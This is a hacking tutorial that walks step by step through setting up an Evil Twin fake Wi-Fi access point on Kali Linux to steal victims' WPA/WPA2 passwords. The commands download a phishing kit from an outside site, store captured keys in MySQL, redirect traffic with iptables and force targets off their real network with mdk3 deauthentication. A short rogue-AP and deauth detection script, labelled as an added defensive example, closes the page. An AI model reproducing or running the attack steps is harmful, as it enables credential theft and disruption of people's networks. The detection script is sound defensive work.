fake access point

Evil Twin APs (i.e. Access Points) are rigged access points that pretend to be WiFi hotspots. When a person connects to an Evil Twin AP, his information will be exposed to the hacker.

To the victim, the malicious access point is a hotspot that has great signal. This perception results from the fact that the hacker is near the victim. People love strong WiFi networks, so it’s likely that a victim will connect to an Evil Twin AP.

The Process

1. Access your Kali computer.

2. Make sure that you have an internet connection.

3. Launch a terminal and enter

apt-get install dhcp3-server

This command will install a DHCP server onto your machine.

4. Type

nano /etc/dhcpd.conf

And press Enter. Your terminal will display an empty file.

5. Type the following configuration:

authoritative;

default-lease-time 600;

max-lease-time 6000;

subnet 192.168.1.128 netmask 255.255.255.128 {

option subnet-mask 255.255.255.128;

option broadcast-address 192.168.1.255;

option routers 192.168.1.129;

option domain-name-servers 8.8.8.8;

range 192.168.1.130 192.168.1.140;

}

6. Once done, use the CTRL+X key combination and press “Y”.

7. Switch to another directory by typing:

cd /var/www

8. Then, issue the following commands:

rm index.html

wget http://hackthistv.com/eviltwin.zip

unzip eviltwin.zip

rm eviltwin.zip

9. Trigger MySQL and the Apache server by typing:

/etc/init.d/mysql start

/etc/init.d/apache2 start

10. You will use MySQL to generate a database for storing WPA/WPA2 passwords. Here are commands that you must issue:

mysql -u root

create database evil_twin;

use evil_twin

create table wpa_keys(password varchar(64), confirm varchar(64));

11. Type “ip route” to determine your local IP address.

12. Identify the name of your network adapter using this command:

airmon-ng start wlan0

13. Update the OUI (Organizationally Unique Identifier) of your Airodump-ng program. Here’s the command:

airodump-ng-oui-update

14. Find the ESSID (Extended Service Set Identification), BSSID (the MAC address of your access point), and the channel that you need to use. The command that you should use is:

airodump-ng -M mon0

15. Activate the Evil Twin AP using this syntax:

airbase-ng -e [insert ESSID here] -c [insert channel number here] -P mon0

16. The Airbase-ng program created a tunnel interface on your behalf. You just have to configure this tunnel interface to connect your wired interface and your “evil” access point. To do this, you must launch a terminal and type the following:

ifconfig [name of tunnel interface] 192.168.1.129 netmask 255.255.255.128

17. Enable internet protocol forwarding through these commands:

route add -net 192.168.1.128 netmask 255.255.255.128 gw 192.168.1.129

echo 1 > /proc/sys/net/ipv4/ip_forward

iptables --table nat --append POSTROUTING --out-interface [name of local interface] -j MASQUERADE

iptables --append FORWARD --in-interface [name of tunnel interface] -j ACCEPT

iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination [LOCAL IP ADDRESS]:80

iptables -t nat -A POSTROUTING -j MASQUERADE

dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid [name of tunnel interface]

/etc/init.d/isc-dhcp-server start

18. Disconnect your targets from their current wireless networks. To accomplish this, you must generate a “blacklist” file to hold the target’s BSSID. Issue the following commands:

echo [BSSID] > blacklist

mdk3 mon0 d -b blacklist -c [CH.#]

19. Look at the terminal that holds your Airbase-ng program. See if a target connected to your access point. When a person tries to connect, he will see a security page that asks for the WPA/WPA2 key.

20. Check the terminal for your MySQL database and enter the following:

use evil_twin

21. Access “wpa_keys” to view the data entered by your target.
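Seen from the network owner's side, the procedure above leaves two observable traces: a beacon that reuses a protected ESSID from an access point outside the inventory, and a burst of deauthentication frames against the real one. The following is an added example, not part of the original page, that checks for both. The AP inventory, frame records, security labels and threshold are constructed assumptions, and it assumes the rogue AP advertises a different security setting than the sanctioned ones.

```python
from collections import Counter

# Assumed inventory of sanctioned APs: ESSID -> {BSSID: (channel, security)}.
KNOWN_APS = {"CorpWiFi": {"aa:bb:cc:00:00:01": (6, "WPA2"),
                          "aa:bb:cc:00:00:02": (11, "WPA2")}}

# Constructed sample frames (not a real capture), as a monitoring sensor might log them.
FRAMES = [
    {"type": "beacon", "essid": "CorpWiFi", "bssid": "aa:bb:cc:00:00:01", "channel": 6, "security": "WPA2"},
    {"type": "beacon", "essid": "CorpWiFi", "bssid": "02:DE:AD:BE:EF:01", "channel": 6, "security": "OPEN"},
    {"type": "beacon", "essid": "CoffeeShop", "bssid": "11:22:33:44:55:66", "channel": 1, "security": "WPA2"},
] + [{"type": "deauth", "bssid": "aa:bb:cc:00:00:01"}] * 40

DEAUTH_THRESHOLD = 25  # assumed per-window limit; tune to the site's baseline


def find_rogue_aps(frames, known_aps):
    """Flag beacons that reuse a protected ESSID from a BSSID outside the
    inventory, or from an inventoried BSSID with the wrong channel/security."""
    findings = {}
    for f in frames:
        if f["type"] != "beacon" or f["essid"] not in known_aps:
            continue
        sanctioned = known_aps[f["essid"]]
        bssid = f["bssid"].lower()
        reasons = []
        if bssid not in sanctioned:
            reasons.append("unknown BSSID")
            if f["security"] not in {sec for _, sec in sanctioned.values()}:
                reasons.append("security mismatch")
        elif sanctioned[bssid] != (f["channel"], f["security"]):
            reasons.append("profile mismatch (possible BSSID spoofing)")
        if reasons:
            findings[(f["essid"], bssid)] = reasons
    return findings


def deauth_bursts(frames, threshold=DEAUTH_THRESHOLD):
    """Return BSSIDs named in more deauthentication frames than the threshold."""
    counts = Counter(f["bssid"].lower() for f in frames if f["type"] == "deauth")
    return {bssid: n for bssid, n in counts.items() if n > threshold}


if __name__ == "__main__":
    for (essid, bssid), reasons in find_rogue_aps(FRAMES, KNOWN_APS).items():
        print(f"ALERT {essid!r} advertised by {bssid}: {', '.join(reasons)}")
    for bssid, n in deauth_bursts(FRAMES).items():
        print(f"ALERT deauth burst against {bssid}: {n} frames")
```

A rogue-AP finding and a deauth burst against the matching sanctioned BSSID in the same time window are a stronger signal together than either alone.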
